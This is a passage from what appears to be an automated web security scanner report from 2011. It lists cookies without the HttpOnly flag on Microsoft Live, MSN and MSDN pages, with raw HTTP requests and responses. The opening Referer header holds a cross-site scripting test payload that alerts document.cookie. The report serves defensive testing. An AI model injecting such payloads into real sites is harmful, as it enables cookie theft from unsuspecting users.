Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cicouid=cc7abda8-722d-4cd3-b76a-29b02a48647arcjRQOvWHnoil_sqd2OXzw; ciconv0=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2

Response

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Set-Cookie: ciconv0=6940311042157494960$8601-b691916b-c3bc-4ec5-b037-99e1592c243a; Domain=.admailtiser.com; Expires=Mon, 31-Jan-2011 01:23:54 GMT; Path=/
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Set-Cookie: ciconv1=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2; Domain=.admailtiser.com; Expires=Mon, 31-Jan-2011 01:23:54 GMT; Path=/
Location: http://ib.adnxs.com/seg?member=104&add_code=86011
Content-Length: 0
Date: Sun, 30 Jan 2011 01:23:53 GMT
Server: Apache


17.369. https://signup.live.com/signup.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signup.live.com
Path:   /signup.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signup.aspx?ru=http%3a%2f%2fmail.live.com%2f%3frru%3dinbox&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US&bk=1296342737&cru=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26rver%3d6.1.6206.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26lc%3d1033%26id%3d251248%26cbcxt%3dhom%26mkt%3den-US HTTP/1.1
Host: signup.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1296342838&rver=6.1.6206.0&wp=MBI_SSL&wreply=https:%2F%2Fsignup.live.com%2Fsignup.aspx%3Fru%3Dhttp%253a%252f%252fmail.live.com%252f%253frru%253dinbox%26wa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1296342524%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26lc%3D1033%26id%3D251248%26cbcxt%3Dhom%26mkt%3Den-US%26bk%3D1296342737%26cru%3Dhttps:%2F%2Flogin.live.com%2Flogin.srf%253fwa%253dwsignin1.0%2526rpsnv%253d11%2526rver%253d6.1.6206.0%2526wp%253dMBI%2526wreply%253dhttp:%25252F%25252Fmail.live.com%25252F%25253Frru%25253Dhome%252526livecom%25253D1%2526lc%253d1033%2526id%253d251248%2526cbcxt%253dhom%2526mkt%253den-US%26lic%3D1&lc=1033&id=68692
Server: Microsoft-IIS/7.0
Set-Cookie: mkt=ep=en-US; domain=.live.com; path=/; secure
Set-Cookie: xid=ffbfad06-ce49-4990-af01-ca3897d55b66&&CO1xxxxxxC208&61; domain=.live.com; path=/; secure
Set-Cookie: xidseq=1; domain=.live.com; path=/; secure
Set-Cookie: mktstate=S=-1109498027&U=&E=en-us&B=en&P=; domain=.live.com; path=/; secure
Set-Cookie: mkt1=norm=en-us; domain=.live.com; path=/; secure
Set-Cookie: mkt2=marketing=en-us; domain=.signup.live.com; path=/; secure
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:33:58 GMT; path=/; secure
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sat, 29 Jan 2011 23:13:57 GMT
Connection: close
Content-Length: 919

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;checkda=1&amp;ct=1296342838&amp;rver=6.1.6206.0&amp;w
...[SNIP]...

17.370. http://social.entertainment.redacted/bloglist.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.entertainment.redacted
Path:   /bloglist.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bloglist.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:49 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=339e672cfcfc4e9bb100367db460c745; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=32E934AA60CC44708EAEB1A4EA677746; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:49 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.371. http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.entertainment.redacted
Path:   /movies/blogs/the-hitlist-blog.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies/blogs/the-hitlist-blog.aspx?feat=04db8167-2807-4c60-b794-b60b92d90ea8 HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:51 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=70a16c71a55c4c61a3a1f7e96fd37f9b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=496C3F39553B4397A714AABA23E48508; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:51 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.372. http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.entertainment.redacted
Path:   /movies/blogs/videodrone-blog.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies/blogs/videodrone-blog.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:53 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=95fdb1a67d8c452591b9b1d3553ca658; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1219E6217C35489A85953685DFCF99E9; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:53 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 56969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.373. http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.entertainment.redacted
Path:   /movies/blogs/videodrone-blogpost.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies/blogs/videodrone-blogpost.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:52 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=6d751073fa5b4121b2cd69496e39f021; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8104721B1DA441FBA6658BE28078FA49; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:52 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.374. http://social.msdn.microsoft.com/Forums/en-US/windowsphone7series/threads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.msdn.microsoft.com
Path:   /Forums/en-US/windowsphone7series/threads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Forums/en-US/windowsphone7series/threads HTTP/1.1
Host: social.msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: .ASPXANONYMOUS=_HXAcN3ezAEkAAAANTFiOTVkNDAtNzBkMy00OTlmLWIwYjgtMDcxN2MxMTZkMWFmbxOZ7JYQP3dzD3-g9V1k7zpmuBI1; expires=Sun, 29-Jan-2012 23:26:34 GMT; path=/; HttpOnly
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Mon, 28-Feb-2011 23:26:34 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB21
Date: Sat, 29 Jan 2011 23:26:34 GMT
Content-Length: 62798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head
...[SNIP]...

17.375. http://specials.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:50:58 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=85e00d6e6f6c4a778e4031e134497c88; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=63CE5261B6254DBF87870C0B65E15402; domain=.redacted; expires=Thu, 18-Aug-2011 01:50:58 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 24408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.376. http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=47b7e33a132247bf8382137776d91eb8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=6378AE381CF74C0AB0F61F11DCCB43D6; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:21 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.377. http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a0e82ca105e74736bef180d33ad85b63; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=3D7690447A274FA6A7A5188FFB75CF63; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:19 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.378. http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Famous-February-birthdays.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Famous-February-birthdays.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=af42dcb823fb4382b27164e71b4553fa; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=14EF63B027F946CD907C6E5D6601CA44; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:26 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.379. http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Jesse-James-ex-arrested.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Jesse-James-ex-arrested.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:22 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=d363cc0566a641bbac227c396c72e6da; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=B5C6E6CBBD8140B1A45E68CFF623563E; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:22 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.380. http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/PETAs-newest-naked-celeb.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/PETAs-newest-naked-celeb.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:15 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ce8cf853b593429c8c5ae3125646c35b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=14CA8A1489AA49D39C1600720CAD343B; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:15 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.381. http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Unlikely-celebrity-friendships.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Unlikely-celebrity-friendships.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=b8024ffbe31247238960e8dad42e6ae0; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=54B802C72C5D4A968AE6BEB7BEB43885; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:25 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.382. http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Billionaires-caucus.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Billionaires-caucus.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:06 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=509e6c71b5ba480d910bf7b7e5f60afe; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=0BDAD1C110174CA4BA5911AED9744835; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:06 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.383. http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:59 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=115826fb361947fba7a59745eee1a2fe; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=19D7523F04DB408783F64E4246E74057; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:59 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.384. http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:10 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=686b26f612ef4ff886afcdf5b0daf95d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=64FF62872D864AAC8B7EAB35C97F487F; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:10 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.385. http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Egypt-new-vp.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Egypt-new-vp.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:58 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
